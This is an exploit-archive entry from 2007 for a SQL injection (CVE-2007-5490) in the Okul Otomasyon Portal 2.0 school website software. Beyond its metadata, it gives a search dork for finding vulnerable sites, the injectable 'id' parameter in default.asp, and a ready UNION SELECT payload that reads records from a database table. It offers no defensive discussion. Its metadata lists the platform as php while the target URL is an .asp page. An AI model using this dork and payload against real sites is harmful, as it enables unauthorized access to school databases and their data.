Okul Otomasyon Portal 2.0 - SQL Injection

Author: dumenci
type: webapps
platform: php
port: 
date_added: 2007-10-15 
date_updated:  
verified: 1 
codes: OSVDB-37863;CVE-2007-5490 
tags: 
aliases:  
screenshot_url:  
application_url:

################################  Dumenci v19.1   ###################################
####                       Okul Otomasyon Portal v2.0                            ####
####                          remote sql injection                               ####
#####################################################################################
#                                                                                   #
#AUTHOR : Okulumun sitesi                                                           #
#Script Download : http://www.okulumunsitesi.com/                                   #
#DORK: "inurl:/k12.tr/?part="                                                       #
#                                                                                   #
#                                                                                   #
#                                                                                   #
# Injection Adress : http://site.com/default.asp?islem=1&id=[sql code]              #
# my COD : -1+union+select+0,1,id,baslik,4,5,6+from+haber                           #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#                                MEFISTO,KÄ±nSÄ±ze,CyberGhost                      #tr#
#####################################################################################

# milw0rm.com [2007-10-16]